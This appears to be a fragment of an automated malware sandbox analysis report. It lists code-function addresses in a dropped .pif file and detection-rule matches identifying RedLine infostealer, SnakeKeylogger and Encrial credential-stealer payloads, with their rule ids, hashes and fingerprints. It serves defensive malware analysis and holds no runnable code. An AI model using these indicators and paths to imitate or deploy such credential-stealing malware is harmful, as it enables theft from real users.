                  Source: C:\Users\user\Links\dajivhqI.pifCode function: 16_2_0040165016_2_00401650
                  Source: C:\Users\user\Links\dajivhqI.pifCode function: 16_2_00402F2016_2_00402F20
                  Source: C:\Users\user\Links\dajivhqI.pifCode function: 16_2_004193C416_2_004193C4
                  Source: C:\Users\user\Links\dajivhqI.pifCode function: 16_2_0041878816_2_00418788
                  Source: C:\Users\user\Links\dajivhqI.pifCode function: 16_2_00402F8916_2_00402F89
                  Source: C:\Users\user\Links\dajivhqI.pifCode function: 16_2_00402B9016_2_00402B90
                  Source: C:\Users\user\Links\dajivhqI.pifCode function: 16_2_004073A016_2_004073A0
                  Source: C:\Users\user\Links\dajivhqI.pifCode function: 16_2_2869144816_2_28691448
                  Source: C:\Users\user\Links\dajivhqI.pifCode function: 16_2_2869144716_2_28691447
                  Source: C:\Users\user\Links\dajivhqI.pifCode function: 16_2_286911A816_2_286911A8
                  Source: C:\Users\user\Links\dajivhqI.pifCode function: 16_2_2B5EB30816_2_2B5EB308
                  Source: C:\Users\user\Links\dajivhqI.pifCode function: 16_2_2B5E473016_2_2B5E4730
                  Source: C:\Users\user\Links\dajivhqI.pifCode function: 16_2_2B5EBE3016_2_2B5EBE30
                  Source: C:\Users\user\Links\dajivhqI.pifCode function: 16_2_2B5E6DE816_2_2B5E6DE8
                  Source: C:\Users\user\Links\dajivhqI.pifCode function: 16_2_2B5EFB5716_2_2B5EFB57
                  Source: C:\Users\user\Links\dajivhqI.pifCode function: 16_2_2B5EFB6816_2_2B5EFB68
                  Source: C:\Users\user\Links\dajivhqI.pifCode function: 16_2_2B5EB30716_2_2B5EB307
                  Source: C:\Users\user\Links\dajivhqI.pifCode function: 16_2_2B5E22D016_2_2B5E22D0
                  Source: C:\Users\user\Links\dajivhqI.pifCode function: 16_2_2B5EF2B816_2_2B5EF2B8
                  Source: C:\Users\user\Links\dajivhqI.pifCode function: 16_2_2B5EF2A716_2_2B5EF2A7
                  Source: C:\Users\user\Links\dajivhqI.pifCode function: 16_2_2B5EA95116_2_2B5EA951
                  Source: C:\Users\user\Links\dajivhqI.pifCode function: 16_2_2B5EA96016_2_2B5EA960
                  Source: C:\Users\user\Links\dajivhqI.pifCode function: 16_2_2B5EF71016_2_2B5EF710
                  Source: C:\Users\user\Links\dajivhqI.pifCode function: 16_2_2B5EF70116_2_2B5EF701
                  Source: C:\Users\user\Links\dajivhqI.pifCode function: 16_2_2B5E472116_2_2B5E4721
                  Source: C:\Users\user\Links\dajivhqI.pifCode function: 16_2_2B5EEE5016_2_2B5EEE50
                  Source: C:\Users\user\Links\dajivhqI.pifCode function: 16_2_2B5EEE6016_2_2B5EEE60
                  Source: C:\Users\user\Links\dajivhqI.pifCode function: 16_2_2B5EBE2F16_2_2B5EBE2F
                  Source: C:\Users\user\Links\dajivhqI.pifCode function: 16_2_2C16049816_2_2C160498
                  Source: C:\Users\user\Links\dajivhqI.pifCode function: 16_2_2C1634A016_2_2C1634A0
                  Source: C:\Users\user\Links\dajivhqI.pifCode function: 16_2_2C16593816_2_2C165938
                  Source: C:\Users\user\Links\dajivhqI.pifCode function: 16_2_2C160AF816_2_2C160AF8
                  Source: C:\Users\user\Links\dajivhqI.pifCode function: 16_2_2C16671216_2_2C166712
                  Source: C:\Users\user\Links\dajivhqI.pifCode function: 16_2_2C16AC1116_2_2C16AC11
                  Source: C:\Users\user\Links\dajivhqI.pifCode function: 16_2_2C16D01816_2_2C16D018
                  Source: C:\Users\user\Links\dajivhqI.pifCode function: 16_2_2C16000616_2_2C160006
                  Source: C:\Users\user\Links\dajivhqI.pifCode function: 16_2_2C16D00816_2_2C16D008
                  Source: C:\Users\user\Links\dajivhqI.pifCode function: 16_2_2C168C3016_2_2C168C30
                  Source: C:\Users\user\Links\dajivhqI.pifCode function: 16_2_2C16AC2016_2_2C16AC20
                  Source: C:\Users\user\Links\dajivhqI.pifCode function: 16_2_2C16004016_2_2C160040
                  Source: C:\Users\user\Links\dajivhqI.pifCode function: 16_2_2C16D47016_2_2C16D470
                  Source: C:\Users\user\Links\dajivhqI.pifCode function: 16_2_2C16B07816_2_2C16B078
                  Source: C:\Users\user\Links\dajivhqI.pifCode function: 16_2_2C16D46116_2_2C16D461
                  Source: C:\Users\user\Links\dajivhqI.pifCode function: 16_2_2C16B06816_2_2C16B068
                  Source: C:\Users\user\Links\dajivhqI.pifCode function: 16_2_2C16048816_2_2C160488
                  Source: C:\Users\user\Links\dajivhqI.pifCode function: 16_2_2C16D8B916_2_2C16D8B9
                  Source: C:\Users\user\Links\dajivhqI.pifCode function: 16_2_2C16B4D016_2_2C16B4D0
                  Source: C:\Users\user\Links\dajivhqI.pifCode function: 16_2_2C16B4C016_2_2C16B4C0
                  Source: C:\Users\user\Links\dajivhqI.pifCode function: 16_2_2C16D8C816_2_2C16D8C8
                  Source: C:\Users\user\Links\dajivhqI.pifCode function: 16_2_2C16DD1216_2_2C16DD12
                  Source: C:\Users\user\Links\dajivhqI.pifCode function: 16_2_2C16B91916_2_2C16B919
                  Source: C:\Users\user\Links\dajivhqI.pifCode function: 16_2_2C16DD2016_2_2C16DD20
                  Source: C:\Users\user\Links\dajivhqI.pifCode function: 16_2_2C16B92816_2_2C16B928
                  Source: C:\Users\user\Links\dajivhqI.pifCode function: 16_2_2C16BD7016_2_2C16BD70
                  Source: C:\Users\user\Links\dajivhqI.pifCode function: 16_2_2C16E17816_2_2C16E178
                  Source: C:\Users\user\Links\dajivhqI.pifCode function: 16_2_2C16E16916_2_2C16E169
                  Source: C:\Users\user\Links\dajivhqI.pifCode function: 16_2_2C16BD8016_2_2C16BD80
                  Source: C:\Users\user\Links\dajivhqI.pifCode function: 16_2_2C168DB816_2_2C168DB8
                  Source: C:\Users\user\Links\dajivhqI.pifCode function: 16_2_2C16E5D016_2_2C16E5D0
                  Source: C:\Users\user\Links\dajivhqI.pifCode function: 16_2_2C16C1D816_2_2C16C1D8
                  Source: C:\Users\user\Links\dajivhqI.pifCode function: 16_2_2C16E5C016_2_2C16E5C0
                  Source: C:\Users\user\Links\dajivhqI.pifCode function: 16_2_2C16C1C816_2_2C16C1C8
                  Source: C:\Users\user\Links\dajivhqI.pifCode function: 16_2_2C1609EA16_2_2C1609EA
                  Source: C:\Users\user\Links\dajivhqI.pifCode function: 16_2_2C16921016_2_2C169210
                  Source: C:\Users\user\Links\dajivhqI.pifCode function: 16_2_2C16EA1916_2_2C16EA19
                  Source: C:\Users\user\Links\dajivhqI.pifCode function: 16_2_2C16920016_2_2C169200
                  Source: C:\Users\user\Links\dajivhqI.pifCode function: 16_2_2C16C63016_2_2C16C630
                  Source: C:\Users\user\Links\dajivhqI.pifCode function: 16_2_2C16C62016_2_2C16C620
                  Source: C:\Users\user\Links\dajivhqI.pifCode function: 16_2_2C16EA2816_2_2C16EA28
                  Source: C:\Users\user\Links\dajivhqI.pifCode function: 16_2_2C16965816_2_2C169658
                  Source: C:\Users\user\Links\dajivhqI.pifCode function: 16_2_2C16EE7016_2_2C16EE70
                  Source: C:\Users\user\Links\dajivhqI.pifCode function: 16_2_2C16966816_2_2C169668
                  Source: C:\Users\user\Links\dajivhqI.pifCode function: 16_2_2C161A9016_2_2C161A90
                  Source: C:\Users\user\Links\dajivhqI.pifCode function: 16_2_2C16EE8016_2_2C16EE80
                  Source: C:\Users\user\Links\dajivhqI.pifCode function: 16_2_2C161A8016_2_2C161A80
                  Source: C:\Users\user\Links\dajivhqI.pifCode function: 16_2_2C169AB216_2_2C169AB2
                  Source: C:\Users\user\Links\dajivhqI.pifCode function: 16_2_2C16F2D816_2_2C16F2D8
                  Source: C:\Users\user\Links\dajivhqI.pifCode function: 16_2_2C161ED916_2_2C161ED9
                  Source: C:\Users\user\Links\dajivhqI.pifCode function: 16_2_2C169AC016_2_2C169AC0
                  Source: C:\Users\user\Links\dajivhqI.pifCode function: 16_2_2C16F2C816_2_2C16F2C8
                  Source: C:\Users\user\Links\dajivhqI.pifCode function: 16_2_2C161EE816_2_2C161EE8
                  Source: C:\Users\user\Links\dajivhqI.pifCode function: 16_2_2C160AE816_2_2C160AE8
                  Source: C:\Users\user\Links\dajivhqI.pifCode function: 16_2_2C169F1816_2_2C169F18
                  Source: C:\Users\user\Links\dajivhqI.pifCode function: 16_2_2C169F0816_2_2C169F08
                  Source: C:\Users\user\Links\dajivhqI.pifCode function: 16_2_2C16233016_2_2C162330
                  Source: C:\Users\user\Links\dajivhqI.pifCode function: 16_2_2C16234016_2_2C162340
                  Source: C:\Users\user\Links\dajivhqI.pifCode function: 16_2_2C16A37016_2_2C16A370
                  Source: C:\Users\user\Links\dajivhqI.pifCode function: 16_2_2C16A36116_2_2C16A361
                  Source: C:\Users\user\Links\dajivhqI.pifCode function: 16_2_2C16279816_2_2C162798
                  Source: C:\Users\user\Links\dajivhqI.pifCode function: 16_2_2C16278A16_2_2C16278A
                  Source: C:\Users\user\Links\dajivhqI.pifCode function: 16_2_2C16A7B816_2_2C16A7B8
                  Source: C:\Users\user\Links\dajivhqI.pifCode function: 16_2_2C16CBAF16_2_2C16CBAF
                  Source: C:\Users\user\Links\dajivhqI.pifCode function: 16_2_2C16CBC016_2_2C16CBC0
                  Source: C:\Users\user\Links\dajivhqI.pifCode function: 16_2_2C16A7C816_2_2C16A7C8
                  Source: C:\Users\user\Links\dajivhqI.pifCode function: 16_2_2C162BF016_2_2C162BF0
                  Source: C:\Users\user\Links\dajivhqI.pifCode function: 16_2_2C162BE016_2_2C162BE0
                  Source: C:\Users\user\Links\dajivhqI.pifCode function: 16_2_2C1F2EB816_2_2C1F2EB8
                  Source: C:\Users\user\Links\dajivhqI.pifCode function: 16_2_2C1F285016_2_2C1F2850
                  Source: C:\Users\user\Links\dajivhqI.pifCode function: 16_2_2C1F0B3016_2_2C1F0B30
                  Source: C:\Users\user\Links\dajivhqI.pifCode function: 16_2_2C1F404016_2_2C1F4040
                  Source: C:\Users\user\Links\dajivhqI.pifCode function: 16_2_2C1F21E816_2_2C1F21E8
                  Source: C:\Users\user\Links\dajivhqI.pifCode function: 16_2_2C1F1B8016_2_2C1F1B80
                  Source: C:\Users\user\Links\dajivhqI.pifCode function: 16_2_2C1F2EA816_2_2C1F2EA8
                  Source: C:\Users\user\Links\dajivhqI.pifCode function: 16_2_2C1F284016_2_2C1F2840
                  Source: C:\Users\user\Links\dajivhqI.pifCode function: 16_2_2C1F0B2016_2_2C1F0B20
                  Source: C:\Users\user\Links\dajivhqI.pifCode function: 16_2_2C1F000616_2_2C1F0006
                  Source: C:\Users\user\Links\dajivhqI.pifCode function: 16_2_2C1F403016_2_2C1F4030
                  Source: C:\Users\user\Links\dajivhqI.pifCode function: 16_2_2C1F004016_2_2C1F0040
                  Source: C:\Users\user\Links\dajivhqI.pifCode function: 16_2_2C1F21D816_2_2C1F21D8
                  Source: C:\Users\user\Links\dajivhqI.pifCode function: 16_2_2C1F1B7116_2_2C1F1B71
                  Source: C:\Users\user\Links\dajivhqI.pifCode function: 16_2_2C1F355016_2_2C1F3550
                  Source: C:\Users\user\Links\dajivhqI.pifCode function: 16_2_2C1F354016_2_2C1F3540
                  Source: C:\Users\user\Links\dajivhqI.pifCode function: 16_2_2C7D9DB816_2_2C7D9DB8
                  Source: C:\Users\user\Links\dajivhqI.pifCode function: 16_2_2C7D2E6016_2_2C7D2E60
                  Source: C:\Users\user\Links\dajivhqI.pifCode function: 16_2_2C7D112C16_2_2C7D112C
                  Source: C:\Users\user\Links\dajivhqI.pifCode function: 16_1_00408C6016_1_00408C60
                  Source: C:\Users\user\Links\dajivhqI.pifCode function: 16_1_0040DC1116_1_0040DC11
                  Source: C:\Users\user\Links\dajivhqI.pifCode function: 16_1_00407C3F16_1_00407C3F
                  Source: C:\Users\user\Links\dajivhqI.pifCode function: 16_1_00418CCC16_1_00418CCC
                  Source: C:\Users\user\Links\dajivhqI.pifCode function: 16_1_00406CA016_1_00406CA0
                  Source: C:\Users\user\Links\dajivhqI.pifCode function: 16_1_004028B016_1_004028B0
                  Source: C:\Users\user\Links\dajivhqI.pifCode function: 16_1_0041A4BE16_1_0041A4BE
                  Source: C:\Users\user\Links\dajivhqI.pifCode function: 16_1_0041824416_1_00418244
                  Source: C:\Users\user\Links\dajivhqI.pifCode function: 16_1_0040165016_1_00401650
                  Source: C:\Users\user\Links\dajivhqI.pifCode function: 16_1_00402F2016_1_00402F20
                  Source: C:\Users\user\Links\dajivhqI.pifCode function: 16_1_004193C416_1_004193C4
                  Source: C:\Users\user\Links\dajivhqI.pifCode function: 16_1_0041878816_1_00418788
                  Source: C:\Users\user\Links\dajivhqI.pifCode function: 16_1_00402F8916_1_00402F89
                  Source: C:\Users\user\Links\dajivhqI.pifCode function: 16_1_00402B9016_1_00402B90
                  Source: C:\Users\user\Links\dajivhqI.pifCode function: 16_1_004073A016_1_004073A0
                  Source: Joe Sandbox ViewDropped File: C:\Users\user\Links\dajivhqI.pif 7BCDC2E607ABC65EF93AFD009C3048970D9E8D1C2A18FC571562396B13EBB301
                  Source: C:\Users\user\Links\dajivhqI.pifCode function: String function: 0040D606 appears 48 times
                  Source: C:\Users\user\Links\dajivhqI.pifCode function: String function: 0040E1D8 appears 88 times
                  Source: C:\Users\user\AppData\Roaming\csrss.exeCode function: String function: 02E9457C appears 835 times
                  Source: C:\Users\user\AppData\Roaming\csrss.exeCode function: String function: 02E9421C appears 64 times
                  Source: C:\Users\user\AppData\Roaming\csrss.exeCode function: String function: 02E94414 appears 246 times
                  Source: C:\Users\user\AppData\Roaming\csrss.exeCode function: String function: 02EA3E9C appears 45 times
                  Source: C:\Users\user\AppData\Roaming\csrss.exeCode function: String function: 02E94240 appears 31 times
                  Source: C:\Users\user\AppData\Roaming\csrss.exeCode function: String function: 02EA3E20 appears 54 times
                  Source: C:\Windows\SysWOW64\mshta.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXEJump to behavior
                  Source: 16.2.dajivhqI.pif.46b268.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                  Source: 16.1.dajivhqI.pif.438038.2.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                  Source: 16.2.dajivhqI.pif.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                  Source: 16.2.dajivhqI.pif.2993e390.7.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 16.2.dajivhqI.pif.2993e390.7.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 11.2.csrss.exe.218d9ba8.7.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                  Source: 16.2.dajivhqI.pif.28551936.4.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 16.2.dajivhqI.pif.28551936.4.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 16.2.dajivhqI.pif.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                  Source: 16.2.dajivhqI.pif.438038.2.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                  Source: 16.2.dajivhqI.pif.2b4e0000.10.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 16.2.dajivhqI.pif.2b4e0000.10.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 16.2.dajivhqI.pif.29915570.9.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 16.2.dajivhqI.pif.29915570.9.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 16.2.dajivhqI.pif.287c0000.5.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 16.2.dajivhqI.pif.287c0000.5.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 16.1.dajivhqI.pif.400000.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                  Source: 16.1.dajivhqI.pif.438038.2.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                  Source: 16.1.dajivhqI.pif.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                  Source: 16.2.dajivhqI.pif.28551936.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 16.2.dajivhqI.pif.28551936.4.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 16.2.dajivhqI.pif.287c0000.5.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 16.2.dajivhqI.pif.287c0000.5.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 16.2.dajivhqI.pif.28550a4e.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 16.2.dajivhqI.pif.28550a4e.3.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 16.1.dajivhqI.pif.46b268.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                  Source: 16.2.dajivhqI.pif.2b4e0000.10.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 16.2.dajivhqI.pif.2b4e0000.10.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 16.3.dajivhqI.pif.26abd218.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 16.3.dajivhqI.pif.26abd218.0.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 11.2.csrss.exe.218d9ba8.7.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                  Source: 11.2.csrss.exe.2190cdd8.6.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                  Source: 16.2.dajivhqI.pif.29916458.8.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 16.2.dajivhqI.pif.29916458.8.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 16.2.dajivhqI.pif.29915570.9.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 16.2.dajivhqI.pif.29915570.9.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
